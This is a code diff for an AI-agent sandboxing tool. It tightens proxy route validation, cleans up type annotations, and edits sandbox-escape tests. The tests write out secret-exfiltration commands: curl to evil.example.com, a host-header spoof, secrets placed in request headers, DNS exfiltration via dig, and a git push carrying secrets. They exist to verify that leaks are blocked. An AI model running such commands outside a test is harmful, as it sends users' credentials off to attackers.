for header, variable in (
@@ -157,8 +157,8 @@ class GitHttpHandler(BaseHTTPRequestHandler):
self.end_headers()
self.wfile.write(body)
def log_message(self, format: str, *args: object) -> None: # type: ignore # noqa: A002
sys.stdout.write(format % args + "\n")
def log_message(self, fmt: str, *args: object) -> None:
sys.stdout.write(fmt % args + "\n")
sys.stdout.flush()
+1 -1
View File
@@ -161,7 +161,7 @@ class Agent:
git_raw = d.get("git-gate")
if git_raw is not None:
gd = as_json_object(git_raw, f"agent '{name}' git-gate")
for k in gd:
for k in gd.keys():
if k != "user":
raise ManifestError(
f"agent '{name}' git-gate.{k} is not allowed at the "
+47 -10
View File
@@ -2,6 +2,7 @@
from __future__ import annotations
import ipaddress
from dataclasses import dataclass, field
from typing import cast
@@ -42,18 +43,17 @@ def validate_egress_routes(
class PipelockRoutePolicy:
"""Per-route pipelock policy overrides.
Stores raw pipelock configuration that's passed through to the
pipelock sidecar. Pipelock validates all config options, so
bot-bottle forwards manifest settings without coercion or strict
validation. Supported options include:
`TlsPassthrough` adds the route host to pipelock's
`tls_interception.passthrough_domains`, so pipelock still enforces
the hostname allowlist but does not MITM/decrypt request bodies or
headers for that host.
- `tls_passthrough`: bool skip TLS MITM for this host
- `ssrf_ip_allowlist`: list of CIDR/IP allow private destinations
- `skip_scan_for_extensions`: list of file extensions to skip DLP
scanning for (e.g., [".whl", ".tar.gz"])
`SsrfIpAllowlist` adds explicit IPs/CIDRs to pipelock's SSRF
allowlist for private/internal destinations behind this route.
"""
Config: dict[str, object] = field(default_factory=dict)
TlsPassthrough: bool = False
SsrfIpAllowlist: tuple[str, ...] = ()
@classmethod
def from_dict(
@@ -61,7 +61,44 @@ class PipelockRoutePolicy:
) -> "PipelockRoutePolicy":
label = f"bottle '{bottle_name}' egress.routes[{idx}] pipelock"
d = as_json_object(raw, label)
return cls(Config=d)
for k in d:
if k not in ("tls_passthrough", "ssrf_ip_allowlist"):
raise ManifestError(
f"{label} has unknown key {k!r}; "
f"only 'tls_passthrough' and 'ssrf_ip_allowlist' "
f"are accepted"
)
tls_passthrough_raw = d.get("tls_passthrough", False)
if not isinstance(tls_passthrough_raw, bool):
raise ManifestError(
f"{label}.tls_passthrough must be a boolean "
f"(was {type(tls_passthrough_raw).__name__})"
)
ssrf_raw = d.get("ssrf_ip_allowlist", [])
if not isinstance(ssrf_raw, list):
raise ManifestError(
f"{label}.ssrf_ip_allowlist must be an array "
f"(was {type(ssrf_raw).__name__})"
)
ssrf_ip_allowlist: list[str] = []
for j, item in enumerate(ssrf_raw):
if not isinstance(item, str) or not item:
raise ManifestError(
f"{label}.ssrf_ip_allowlist[{j}] must be a non-empty "
f"string (was {type(item).__name__})"
)
try:
ipaddress.ip_network(item, strict=False)
except ValueError as e:
raise ManifestError(
f"{label}.ssrf_ip_allowlist[{j}] must be an IP address "
f"or CIDR (was {item!r}): {e}"
)
ssrf_ip_allowlist.append(item)
return cls(
TlsPassthrough=tls_passthrough_raw,
SsrfIpAllowlist=tuple(ssrf_ip_allowlist),
)
@dataclass(frozen=True)
+2 -2
View File
@@ -246,7 +246,7 @@ class GitUser:
@classmethod
def from_dict(cls, bottle_name: str, raw: object) -> "GitUser":
d = as_json_object(raw, f"bottle '{bottle_name}' git-gate.user")
for k in d:
for k in d.keys():
if k not in {"name", "email"}:
raise ManifestError(
f"bottle '{bottle_name}' git-gate.user has unknown key {k!r}; "
@@ -281,7 +281,7 @@ def parse_git_gate_config(
raw: object,
) -> tuple[tuple[GitEntry, ...], GitUser]:
d = as_json_object(raw, f"bottle '{bottle_name}' git-gate")
for k in d:
for k in d.keys():
if k not in {"user", "repos"}:
raise ManifestError(
f"bottle '{bottle_name}' git-gate has unknown key {k!r}; "
+5 -5
View File
@@ -54,9 +54,9 @@ def load_bottles_from_dir(bottles_dir: Path) -> dict[str, Bottle]:
try:
fm, _body = parse_frontmatter(path.read_text())
except OSError as e:
raise ManifestError(f"could not read {path}: {e}") from e
raise ManifestError(f"could not read {path}: {e}")
except YamlSubsetError as e:
raise ManifestError(f"{path}: {e}") from e
raise ManifestError(f"{path}: {e}")
validate_bottle_frontmatter_keys(path, fm.keys())
raws[name] = fm
return resolve_bottles(raws)
@@ -66,7 +66,7 @@ def load_agents_from_dir(
agents_dir: Path,
bottle_names: set[str],
*,
source: str, # noqa: F841 — unused, but required by interface
source: str,
) -> dict[str, Agent]:
"""Walk `<agents_dir>/*.md`, parse each as an agent, and return
`{name: Agent}`. The Markdown body becomes the agent's prompt.
@@ -87,9 +87,9 @@ def load_agents_from_dir(
try:
fm, body = parse_frontmatter(path.read_text())
except OSError as e:
raise ManifestError(f"could not read {path}: {e}") from e
raise ManifestError(f"could not read {path}: {e}")
except YamlSubsetError as e:
raise ManifestError(f"{path}: {e}") from e
raise ManifestError(f"{path}: {e}")
validate_agent_frontmatter_keys(path, fm.keys())
# Build the dict Agent.from_dict expects. The body becomes
# prompt; Claude Code passthrough fields stay in fm and get
+3 -3
View File
@@ -60,11 +60,11 @@ def _validate_frontmatter_keys(
) -> None:
from .manifest_util import ManifestError
key_set = set(keys) # type: ignore
unknown = key_set - allowed_keys # type: ignore
key_set = set(keys)
unknown = key_set - allowed_keys
if unknown:
allowed = ", ".join(sorted(allowed_keys))
raise ManifestError(
f"{kind} file {path}: unknown frontmatter key(s) "
f"{sorted(unknown)}; allowed keys are {allowed}." # type: ignore
f"{sorted(unknown)}; allowed keys are {allowed}."
)
+34 -41
View File
@@ -19,7 +19,6 @@ from __future__ import annotations
from dataclasses import dataclass
from pathlib import Path
from typing import cast
from .egress import EgressRoute, egress_routes_for_bottle
from .supervise import SUPERVISE_HOSTNAME
@@ -132,11 +131,8 @@ def pipelock_effective_ssrf_ip_allowlist(
"""
seen: dict[str, None] = {ip: None for ip in extra}
for route in bottle.egress.routes:
ssrf_raw = route.Pipelock.Config.get("ssrf_ip_allowlist", [])
if isinstance(ssrf_raw, list):
for ip in ssrf_raw:
if isinstance(ip, str):
seen.setdefault(ip, None)
for ip in route.Pipelock.SsrfIpAllowlist:
seen.setdefault(ip, None)
return sorted(seen.keys())
@@ -223,15 +219,6 @@ def pipelock_build_config(
)
if effective_ssrf_ip_allowlist:
cfg["ssrf"] = {"ip_allowlist": effective_ssrf_ip_allowlist}
# Merge per-route pipelock config (e.g., response_body_scanning settings).
# Routes can specify arbitrary pipelock options that apply globally.
for route in bottle.egress.routes:
for key, value in route.Pipelock.Config.items():
if key not in ("tls_passthrough", "ssrf_ip_allowlist"):
if key not in cfg:
cfg[key] = value
return cfg
@@ -272,7 +259,7 @@ def _required_dict(
value = obj.get(key)
if not isinstance(value, dict):
raise _pipelock_render_error(section, key, "a mapping")
return cast(dict[str, object], value)
return value
def _required_bool(obj: dict[str, object], section: str, key: str) -> bool:
@@ -302,12 +289,9 @@ def _required_str_list(
key: str,
) -> list[str]:
value = obj.get(key)
if not isinstance(value, list):
if not isinstance(value, list) or not all(isinstance(v, str) for v in value):
raise _pipelock_render_error(section, key, "a list of strings")
value_list = cast(list[object], value)
if not all(isinstance(v, str) for v in value_list):
raise _pipelock_render_error(section, key, "a list of strings")
return cast(list[str], value)
return value
def _optional_str_list(
@@ -423,42 +407,49 @@ def pipelock_render_yaml(cfg: dict[str, object]) -> str:
lines: list[str] = []
lines.append(f"version: {cfg['version']}")
lines.append(f"mode: {cfg['mode']}")
lines.append(f"enforce: {_bool(cast(bool, cfg['enforce']))}")
lines.append(f"enforce: {_bool(cfg['enforce'])}")
lines.append("")
lines.append("api_allowlist:")
api_allowlist = cast(list[str], cfg["api_allowlist"])
api_allowlist = cfg["api_allowlist"]
assert isinstance(api_allowlist, list)
for h in api_allowlist:
lines.append(f' - "{h}"')
lines.append("")
if "seed_phrase_detection" in cfg:
lines.append("seed_phrase_detection:")
spd = cast(dict[str, object], cfg["seed_phrase_detection"])
lines.append(f" enabled: {_bool(cast(bool, spd['enabled']))}")
spd = cfg["seed_phrase_detection"]
assert isinstance(spd, dict)
lines.append(f" enabled: {_bool(spd['enabled'])}")
lines.append("")
lines.append("forward_proxy:")
fp = cast(dict[str, object], cfg["forward_proxy"])
lines.append(f" enabled: {_bool(cast(bool, fp['enabled']))}")
fp = cfg["forward_proxy"]
assert isinstance(fp, dict)
lines.append(f" enabled: {_bool(fp['enabled'])}")
lines.append("")
lines.append("dlp:")
dlp = cast(dict[str, object], cfg["dlp"])
lines.append(f" include_defaults: {_bool(cast(bool, dlp['include_defaults']))}")
lines.append(f" scan_env: {_bool(cast(bool, dlp['scan_env']))}")
dlp = cfg["dlp"]
assert isinstance(dlp, dict)
lines.append(f" include_defaults: {_bool(dlp['include_defaults'])}")
lines.append(f" scan_env: {_bool(dlp['scan_env'])}")
lines.append("")
lines.append("request_body_scanning:")
rbs = cast(dict[str, object], cfg["request_body_scanning"])
lines.append(f' action: "{cast(str, rbs["action"])}"')
rbs = cfg["request_body_scanning"]
assert isinstance(rbs, dict)
lines.append(f' action: "{rbs["action"]}"')
if "scan_headers" in rbs:
lines.append(f" scan_headers: {_bool(cast(bool, rbs['scan_headers']))}")
lines.append(f" scan_headers: {_bool(rbs['scan_headers'])}")
if "header_mode" in rbs:
lines.append(f' header_mode: "{cast(str, rbs["header_mode"])}"')
lines.append(f' header_mode: "{rbs["header_mode"]}"')
if "tls_interception" in cfg:
lines.append("")
lines.append("tls_interception:")
tls = cast(dict[str, object], cfg["tls_interception"])
lines.append(f" enabled: {_bool(cast(bool, tls['enabled']))}")
lines.append(f' ca_cert: "{cast(str, tls["ca_cert"])}"')
lines.append(f' ca_key: "{cast(str, tls["ca_key"])}"')
passthrough = cast(list[str], tls["passthrough_domains"])
tls = cfg["tls_interception"]
assert isinstance(tls, dict)
lines.append(f" enabled: {_bool(tls['enabled'])}")
lines.append(f' ca_cert: "{tls["ca_cert"]}"')
lines.append(f' ca_key: "{tls["ca_key"]}"')
passthrough = tls["passthrough_domains"]
assert isinstance(passthrough, list)
if passthrough:
lines.append(" passthrough_domains:")
for d in passthrough:
@@ -466,9 +457,11 @@ def pipelock_render_yaml(cfg: dict[str, object]) -> str:
if "ssrf" in cfg:
lines.append("")
lines.append("ssrf:")
ssrf = cast(dict[str, object], cfg["ssrf"])
ssrf = cfg["ssrf"]
assert isinstance(ssrf, dict)
lines.append(" ip_allowlist:")
ip_allowlist = cast(list[str], ssrf["ip_allowlist"])
ip_allowlist = ssrf["ip_allowlist"]
assert isinstance(ip_allowlist, list)
for ip in ip_allowlist:
lines.append(f' - "{ip}"')
return "\n".join(lines) + "\n"
+6 -6
View File
@@ -138,7 +138,7 @@ def _pump(name: str, stream: IO[bytes]) -> None:
sys.stdout.flush()
def _spawn(spec: _DaemonSpec) -> subprocess.Popen[bytes]:
def _spawn(spec: _DaemonSpec) -> subprocess.Popen:
proc = subprocess.Popen(
list(spec.argv),
stdout=subprocess.PIPE,
@@ -158,7 +158,7 @@ class _Supervisor:
def __init__(self, specs: Sequence[_DaemonSpec]):
self.specs = tuple(specs)
self.procs: list[tuple[_DaemonSpec, subprocess.Popen[bytes]]] = []
self.procs: list[tuple[_DaemonSpec, subprocess.Popen]] = []
self.shutdown_at: float | None = None
# Names of children that have been logged as having exited
# so we only log each death once across watch-loop ticks.
@@ -360,20 +360,20 @@ def main(argv: Sequence[str] | None = None) -> int:
sup = _Supervisor(specs)
sup.start_all()
signal.signal(signal.SIGTERM, lambda *_: sup.request_shutdown("SIGTERM")) # type: ignore
signal.signal(signal.SIGINT, lambda *_: sup.request_shutdown("SIGINT")) # type: ignore
signal.signal(signal.SIGTERM, lambda *_: sup.request_shutdown("SIGTERM"))
signal.signal(signal.SIGINT, lambda *_: sup.request_shutdown("SIGINT"))
# SIGHUP reload path: egress_apply.py runs `docker kill
# --signal HUP <bundle>` after writing routes.yaml. The kernel
# delivers SIGHUP to PID 1 (this supervisor); forward it to
# mitmdump so it reloads its addon.
signal.signal(signal.SIGHUP, lambda *_: sup.forward_signal(signal.SIGHUP, "egress")) # type: ignore
signal.signal(signal.SIGHUP, lambda *_: sup.forward_signal(signal.SIGHUP, "egress"))
# SIGUSR1 pipelock-restart path: pipelock_apply.py runs
# `docker kill --signal USR1 <bundle>` after writing
# pipelock.yaml. Pipelock has no in-process reload, so the
# supervisor restarts the pipelock daemon in place (other
# daemons keep running — specifically supervise, whose MCP
# socket would drop on a whole-container `docker restart`).
signal.signal(signal.SIGUSR1, lambda *_: sup.request_restart("pipelock")) # type: ignore
signal.signal(signal.SIGUSR1, lambda *_: sup.request_restart("pipelock"))
while not sup.tick():
time.sleep(_POLL_INTERVAL)
+4 -4
View File
@@ -519,22 +519,22 @@ def _atomic_write(path: Path, content: str, *, mode: int) -> None:
try:
import fcntl as _fcntl
def _try_flock(fd: int) -> None: # type: ignore[reportRedeclaration]
def _try_flock(fd: int) -> None:
try:
_fcntl.flock(fd, _fcntl.LOCK_EX)
except OSError:
pass
def _try_funlock(fd: int) -> None: # type: ignore[reportRedeclaration]
def _try_funlock(fd: int) -> None:
try:
_fcntl.flock(fd, _fcntl.LOCK_UN)
except OSError:
pass
except ImportError: # pragma: no cover — Windows path
def _try_flock(fd: int) -> None: # noqa: F841 — Windows fallback
def _try_flock(fd: int) -> None:
return None
def _try_funlock(fd: int) -> None: # noqa: F841 — Windows fallback
def _try_funlock(fd: int) -> None:
return None
+3 -3
View File
@@ -485,7 +485,7 @@ def handle_tools_call(
if not isinstance(name, str):
raise _RpcError(ERR_INVALID_PARAMS, "tools/call missing 'name'")
if name == _sv.TOOL_LIST_EGRESS_ROUTES:
return handle_list_egress_routes(typing.cast(dict[str, object], params.get("arguments", {})), config)
return handle_list_egress_routes(params.get("arguments", {}), config)
args_raw = params.get("arguments", {})
if not isinstance(args_raw, dict):
@@ -590,7 +590,7 @@ class MCPHandler(http.server.BaseHTTPRequestHandler):
server_version = f"{SERVER_NAME}/{SERVER_VERSION}"
def log_message(self, format: str, *args: typing.Any) -> None: # noqa: A002
def log_message(self, format: str, *args: typing.Any) -> None:
if os.environ.get("SUPERVISE_DEBUG"):
super().log_message(format, *args)
@@ -630,7 +630,7 @@ class MCPHandler(http.server.BaseHTTPRequestHandler):
except _RpcError as e:
self._write_jsonrpc(jsonrpc_error(req.id, e.code, e.message))
return
except Exception as e: # noqa: W0718 — catch-all for RPC dispatch errors
except Exception as e: # pragma: no cover — defensive
sys.stderr.write(f"supervise: internal error: {e}\n")
self._write_jsonrpc(jsonrpc_error(req.id, ERR_INTERNAL, "internal error"))
return
+2 -9
View File
@@ -13,15 +13,8 @@ DEFAULT_WORKSPACE_MODE = "755"
class WorkspaceSpec(Protocol):
@property
def copy_cwd(self) -> bool:
"""Whether to copy the current working directory."""
...
@property
def user_cwd(self) -> str:
"""The user's current working directory."""
...
copy_cwd: bool
user_cwd: str
@dataclass(frozen=True)
+2 -4
View File
@@ -58,7 +58,6 @@ from __future__ import annotations
import re
from dataclasses import dataclass
from typing import cast
class YamlSubsetError(ValueError):
@@ -284,7 +283,7 @@ def _split_flow(body: str, lineno: int, kind: str) -> list[str]:
depth_c = 0
in_single = False
in_double = False
cur: list[str] = []
cur = []
for ch in body:
if ch == "'" and not in_double:
in_single = not in_single
@@ -331,7 +330,6 @@ def _split_key_value(content: str, lineno: int) -> tuple[str, str]:
if i + 1 >= len(content) or content[i + 1] in (" ", "\t"):
return content[:i].strip(), content[i + 1:].lstrip()
die(f"yaml-subset: line {lineno} missing `: ` separator: {content!r}")
return "", "" # unreachable, but needed for type checker
def _parse_block(
@@ -538,7 +536,7 @@ def parse_yaml_subset(text: str) -> dict[str, object]:
)
if not isinstance(value, dict):
die("yaml-subset: top-level value must be a mapping")
return cast(dict[str, object], value)
return value
def parse_frontmatter(text: str) -> tuple[dict[str, object], str]:
+1 -6
View File
@@ -11,10 +11,5 @@
],
"pythonVersion": "3.11",
"typeCheckingMode": "strict",
"reportMissingTypeStubs": "none",
"reportUnknownMemberType": false,
"reportUnknownParameterType": false,
"reportUnknownVariableType": false,
"reportUnknownArgumentType": false,
"reportPrivateUsage": false
"reportMissingTypeStubs": "none"
}
+2 -2
View File
@@ -32,11 +32,11 @@ from bot_bottle.backend.docker.network import (
network_create_internal,
network_remove,
)
from bot_bottle.pipelock import (
from bot_bottle.backend.docker.pipelock import (
PIPELOCK_CA_CERT_IN_CONTAINER,
PIPELOCK_CA_KEY_IN_CONTAINER,
pipelock_tls_init,
)
from bot_bottle.backend.docker.pipelock import pipelock_tls_init
from bot_bottle.pipelock import PipelockProxy
from bot_bottle.backend.docker.pipelock_apply import (
PipelockApplyError,
+16 -16
View File
@@ -195,10 +195,10 @@ class TestSandboxEscape(unittest.TestCase):
except BaseException:
pass
cls._identity = ""
if cls._stage_dir is not None: # type: ignore
if cls._stage_dir is not None:
shutil.rmtree(cls._stage_dir, ignore_errors=True)
cls._stage_dir = None # type: ignore[assignment]
if cls._key_path is not None: # type: ignore
if cls._key_path is not None:
try:
cls._key_path.unlink()
except OSError:
@@ -212,7 +212,7 @@ class TestSandboxEscape(unittest.TestCase):
`bottle.egress.routes` (only api.anthropic.com is). Pipelock
or egress should reject the request with a non-200 response,
and the actual upstream's content must not appear in stdout."""
r = self._bottle.exec( # type: ignore
r = self._bottle.exec(
'curl --silent --show-error --max-time 8 --fail '
'https://evil.example.com/'
)
@@ -232,7 +232,7 @@ class TestSandboxEscape(unittest.TestCase):
hostname to a non-allowlisted IP. Pipelock should
not honor the spoof (it does its own resolution)."""
with self.subTest(attack="direct IP"):
r = self._bottle.exec( # type: ignore
r = self._bottle.exec(
'curl --silent --show-error --max-time 8 --fail '
'https://198.51.100.1/'
)
@@ -243,7 +243,7 @@ class TestSandboxEscape(unittest.TestCase):
)
with self.subTest(attack="host-header spoof"):
r = self._bottle.exec( # type: ignore
r = self._bottle.exec(
'curl --silent --show-error --max-time 8 --fail '
'--resolve api.anthropic.com:443:198.51.100.1 '
'https://api.anthropic.com/'
@@ -265,13 +265,13 @@ class TestSandboxEscape(unittest.TestCase):
# `"blocked: request body contains secret"`).
_SANDBOX_BLOCK_MARKERS = ("egress:", "pipelock", "blocked:")
def _assert_sandbox_block(self, label: str, r: object) -> None: # type: ignore
def _assert_sandbox_block(self, label: str, r) -> None:
"""A real sandbox block produces an HTTP 403 with a
recognizable sandbox sidecar marker in the body. ANY
other outcome (200 from upstream, 401/404 from upstream,
non-marker 5xx) means the request escaped the secret
reached the network."""
body_and_code = (r.stdout or "").strip() # type: ignore
body_and_code = (r.stdout or "").strip()
# The curl invocation appends `\nHTTP_CODE:%{http_code}` so
# we can disambiguate. Split that off.
http_code = ""
@@ -281,7 +281,7 @@ class TestSandboxEscape(unittest.TestCase):
body, _, http_code = body_and_code.rpartition(marker)
http_code = http_code.strip()
body = body.rstrip()
haystack = (body + " " + (r.stderr or "")).lower() # type: ignore
haystack = (body + " " + (r.stderr or "")).lower()
has_marker = any(m in haystack for m in self._SANDBOX_BLOCK_MARKERS)
self.assertTrue(
has_marker and http_code == "403",
@@ -290,7 +290,7 @@ class TestSandboxEscape(unittest.TestCase):
f"If the response came from the actual upstream, the "
f"secret REACHED the network — that's the leak this "
f"test exists to catch. body={body!r} "
f"stderr={(r.stderr or '').strip()!r}", # type: ignore
f"stderr={(r.stderr or '').strip()!r}",
)
def test_3_http_exfil_blocked(self) -> None:
@@ -343,9 +343,9 @@ class TestSandboxEscape(unittest.TestCase):
f'-H "X-Custom: $TEST_SECRET_ANTHROPIC"',
),
]
for name, cmd in shapes: # type: ignore
for name, cmd in shapes:
with self.subTest(shape=name):
r = self._bottle.exec(cmd) # type: ignore
r = self._bottle.exec(cmd)
self._assert_sandbox_block(name, r)
# ---- attack 4: DNS exfil -----------------------------------------
@@ -365,7 +365,7 @@ class TestSandboxEscape(unittest.TestCase):
intact (PRD 0022 Q2)."""
with self.subTest(attack="crafted subdomain"):
r = self._bottle.exec( # type: ignore
r = self._bottle.exec(
'curl --silent --show-error --max-time 8 --fail '
'"https://$TEST_SECRET_GENERIC.api.anthropic.com/"'
)
@@ -379,7 +379,7 @@ class TestSandboxEscape(unittest.TestCase):
# `+short +tries=1 +time=3`: no debug output, one attempt,
# 3s timeout. Outside the internal network has no path;
# dig should fail or return empty.
r = self._bottle.exec( # type: ignore
r = self._bottle.exec(
'dig +short +tries=1 +time=3 @8.8.8.8 '
'"$TEST_SECRET_GENERIC.example.com" '
'; echo "EXIT=$?"'
@@ -431,7 +431,7 @@ class TestSandboxEscape(unittest.TestCase):
with self.subTest(secret=name):
# Fresh repo per shape so prior commits don't
# confuse gitleaks's diff. -rm -rf is best-effort.
script = ( # type: ignore
script = (
'set -eu\n'
'cd /tmp\n'
'rm -rf sandbox-escape-repo\n'
@@ -446,8 +446,8 @@ class TestSandboxEscape(unittest.TestCase):
f'git remote add origin {upstream_url}\n'
'git push origin HEAD:refs/heads/master 2>&1\n'
)
r = self._bottle.exec(script) # type: ignore
combined = (r.stderr + r.stdout).lower() # type: ignore
r = self._bottle.exec(script)
combined = (r.stderr + r.stdout).lower()
self.assertNotEqual(
0, r.returncode,
+1 -1
View File
@@ -16,7 +16,7 @@ from bot_bottle.egress import CODEX_HOST_CREDENTIAL_TOKEN_REF
def _jwt(exp: int) -> str:
def enc(obj: dict[str, object]) -> str: # type: ignore
def enc(obj: dict) -> str:
raw = json.dumps(obj, separators=(",", ":")).encode()
return base64.urlsafe_b64encode(raw).decode().rstrip("=")
return f"{enc({'alg': 'none'})}.{enc({'exp': exp})}.sig"
+2 -2
View File
@@ -175,9 +175,9 @@ class TestExecUserSwitching(unittest.TestCase):
class TestExecResultParity(unittest.TestCase):
"""Both backends return ExecResult with returncode, stdout, stderr."""
def _stub_run(self, argv: object, **kwargs: object) -> object: # type: ignore
def _stub_run(self, argv, **kwargs):
return subprocess.CompletedProcess(
argv, 0, stdout="out\n", stderr="err\n", # type: ignore
argv, 0, stdout="out\n", stderr="err\n",
)
def test_docker_exec_result_shape(self):
+6 -6
View File
@@ -65,7 +65,7 @@ class TestEnumerateActiveAgents(unittest.TestCase):
)
class _FakeBackend:
def __init__(self, items: object, available: object = True) -> None: # type: ignore
def __init__(self, items, available=True):
self._items = items
self._available = available
@@ -100,13 +100,13 @@ class TestEnumerateActiveAgents(unittest.TestCase):
)
class _FakeBackend:
def __init__(self, items: object) -> None: # type: ignore
def __init__(self, items):
self._items = items
def is_available(self) -> bool:
def is_available(self):
return True
def enumerate_active(self) -> object:
def enumerate_active(self):
return self._items
with patch.object(
@@ -150,11 +150,11 @@ class TestEnumerateActiveAgents(unittest.TestCase):
)
class _FakeBackend:
def __init__(self, items: object, available: object) -> None: # type: ignore
def __init__(self, items, available):
self._items = items
self._available = available
def is_available(self) -> object:
def is_available(self):
return self._available
def enumerate_active(self):
+3 -3
View File
@@ -67,13 +67,13 @@ class TestApplyCapabilityChange(_FakeHomeMixin, unittest.TestCase):
self._orig_push = capability_apply._push_working_tree
self._orig_teardown = capability_apply._teardown_bottle
def stub_snapshot(slug: object) -> None: # type: ignore
def stub_snapshot(slug):
self._calls.append(f"snapshot:{slug}")
def stub_push(slug: object) -> None: # type: ignore
def stub_push(slug):
self._calls.append(f"push:{slug}")
def stub_teardown(slug: object) -> None: # type: ignore
def stub_teardown(slug):
self._calls.append(f"teardown:{slug}")
capability_apply.snapshot_transcript = stub_snapshot # type: ignore[assignment]
+4 -4
View File
@@ -31,7 +31,7 @@ class TestCmdCleanup(unittest.TestCase):
return_value=("docker", "smolmachines"),
), patch.object(
cmd, "get_bottle_backend",
side_effect=lambda name: backends_by_name[name], # type: ignore
side_effect=lambda name: backends_by_name[name],
), patch.object(
cmd, "_prompt_yes", return_value=True,
):
@@ -52,7 +52,7 @@ class TestCmdCleanup(unittest.TestCase):
return_value=("docker", "smolmachines"),
), patch.object(
cmd, "get_bottle_backend",
side_effect=lambda name: backends_by_name[name], # type: ignore
side_effect=lambda name: backends_by_name[name],
), patch.object(
cmd, "_prompt_yes",
) as prompt:
@@ -71,7 +71,7 @@ class TestCmdCleanup(unittest.TestCase):
return_value=("docker", "smolmachines"),
), patch.object(
cmd, "get_bottle_backend",
side_effect=lambda name: backends_by_name[name], # type: ignore
side_effect=lambda name: backends_by_name[name],
), patch.object(
cmd, "_prompt_yes", return_value=False,
):
@@ -91,7 +91,7 @@ class TestCmdCleanup(unittest.TestCase):
return_value=("docker", "smolmachines"),
), patch.object(
cmd, "get_bottle_backend",
side_effect=lambda name: backends_by_name[name], # type: ignore
side_effect=lambda name: backends_by_name[name],
), patch.object(
cmd, "_prompt_yes", return_value=True,
):
+1 -1
View File
@@ -36,7 +36,7 @@ class TestCaptureSessionState(_FakeHomeMixin, unittest.TestCase):
# covers the real docker cp path.
self._snap_calls: list[str] = []
self._orig_snap = start_mod.snapshot_transcript
start_mod.snapshot_transcript = lambda identity: ( # type: ignore
start_mod.snapshot_transcript = lambda identity: (
self._snap_calls.append(identity)
)
+11 -11
View File
@@ -21,14 +21,14 @@ def _jwt(exp: int) -> str:
return _jwt_with_payload({"exp": exp})
def _jwt_with_payload(payload: dict[str, object]) -> str: # type: ignore
def enc(obj: dict[str, object]) -> str: # type: ignore
def _jwt_with_payload(payload: dict) -> str:
def enc(obj: dict) -> str:
raw = json.dumps(obj, separators=(",", ":")).encode()
return base64.urlsafe_b64encode(raw).decode().rstrip("=")
return f"{enc({'alg': 'none'})}.{enc(payload)}.sig"
def _jwt_payload(token: str) -> dict[str, object]: # type: ignore
def _jwt_payload(token: str) -> dict:
payload = token.split(".")[1]
payload += "=" * (-len(payload) % 4)
return json.loads(base64.urlsafe_b64decode(payload.encode()).decode())
@@ -43,7 +43,7 @@ class TestCodexHostAccessToken(unittest.TestCase):
def tearDown(self):
self.tmp.cleanup()
def _write(self, payload: dict[str, object]) -> None: # type: ignore
def _write(self, payload: dict) -> None:
self.auth_path.write_text(json.dumps(payload))
def test_auth_path_uses_codex_home(self):
@@ -210,11 +210,11 @@ class TestCodexHostAccessToken(unittest.TestCase):
access_payload = _jwt_payload(dummy["tokens"]["access_token"])
auth = access_payload["https://api.openai.com/auth"]
profile = access_payload["https://api.openai.com/profile"]
self.assertEqual("plus", auth["chatgpt_plan_type"]) # type: ignore
self.assertEqual("acct-real", auth["chatgpt_account_id"]) # type: ignore
self.assertEqual("bot-bottle-placeholder", auth["chatgpt_user_id"]) # type: ignore
self.assertEqual("bot-bottle@example.invalid", profile["email"]) # type: ignore
self.assertTrue(profile["email_verified"]) # type: ignore
self.assertEqual("plus", auth["chatgpt_plan_type"])
self.assertEqual("acct-real", auth["chatgpt_account_id"])
self.assertEqual("bot-bottle-placeholder", auth["chatgpt_user_id"])
self.assertEqual("bot-bottle@example.invalid", profile["email"])
self.assertTrue(profile["email_verified"])
def test_dummy_auth_redacts_unknown_future_auth_fields(self):
secrets = [
@@ -289,8 +289,8 @@ class TestCodexHostAccessToken(unittest.TestCase):
self.assertEqual({}, access_payload["future_nested"])
self.assertEqual([], access_payload["future_list"])
auth = access_payload["https://api.openai.com/auth"]
self.assertEqual("bot-bottle-placeholder", auth["session_context"]) # type: ignore
self.assertEqual({}, auth["nested"]) # type: ignore
self.assertEqual("bot-bottle-placeholder", auth["session_context"])
self.assertEqual({}, auth["nested"])
if __name__ == "__main__":
+5 -6
View File
@@ -12,7 +12,6 @@ from __future__ import annotations
import subprocess
import unittest
from pathlib import Path
from typing import Any
from unittest import mock
from bot_bottle.agent_provider import AgentProvisionPlan
@@ -46,7 +45,7 @@ def _manifest(*, supervise: bool, with_git: bool, with_egress: bool) -> Manifest
"""Minimal manifest with the toggles the chunk-1 matrix needs.
The renderer only reads from the plan, not the manifest, so this
is just here to back BottleSpec."""
bottle: dict[str, object] = {}
bottle: dict = {}
if supervise:
bottle["supervise"] = True
if with_git:
@@ -272,13 +271,13 @@ class TestAgentAlwaysPresent(unittest.TestCase):
dockerfile="",
guest_env={"CODEX_HOME": "/home/node/.codex"},
)
plan = type(plan)(**{**vars(plan), "agent_provision": provision}) # type: ignore
plan = type(plan)(**{**vars(plan), "agent_provision": provision})
s = bottle_plan_to_compose(plan)["services"]["agent"]
self.assertIn("CODEX_HOME=/home/node/.codex", s["environment"])
def test_agent_runsc_runtime(self):
plan = _plan()
plan = type(plan)(**{**vars(plan), "use_runsc": True}) # type: ignore
plan = type(plan)(**{**vars(plan), "use_runsc": True})
s = bottle_plan_to_compose(plan)["services"]["agent"]
self.assertEqual("runsc", s["runtime"])
@@ -310,8 +309,8 @@ class TestSidecarBundleShape(unittest.TestCase):
+ supervise). PRD 0024 chunk 5 dropped the legacy four-sidecar
shape entirely, so the bundle is the only thing exercised here."""
def _render(self, **plan_kwargs: object) -> Any: # type: ignore
return bottle_plan_to_compose(_plan(**plan_kwargs)) # type: ignore
def _render(self, **plan_kwargs):
return bottle_plan_to_compose(_plan(**plan_kwargs))
def test_emits_two_services_minimal(self):
spec = self._render()
+3 -3
View File
@@ -52,7 +52,7 @@ def _plan(
agent_provision: AgentProvisionPlan | None = None,
supervise: bool = False,
) -> DockerBottlePlan:
bottle_json: dict = {"agent_provider": {"template": "claude"}} # type: ignore
bottle_json: dict = {"agent_provider": {"template": "claude"}}
if supervise:
bottle_json["supervise"] = True
manifest = Manifest.from_json_obj({
@@ -165,7 +165,7 @@ class TestClaudeProvisionSkills(unittest.TestCase):
bottle = _make_bottle()
with patch(
"bot_bottle.backend.util.host_skill_dir",
side_effect=lambda n: f"/host/skills/{n}", # type: ignore
side_effect=lambda n: f"/host/skills/{n}",
), patch(
"bot_bottle.contrib.claude.agent_provider.os.path.isdir",
return_value=True,
@@ -191,7 +191,7 @@ class TestClaudeProvisionSkills(unittest.TestCase):
bottle = _make_bottle()
with patch(
"bot_bottle.backend.util.host_skill_dir",
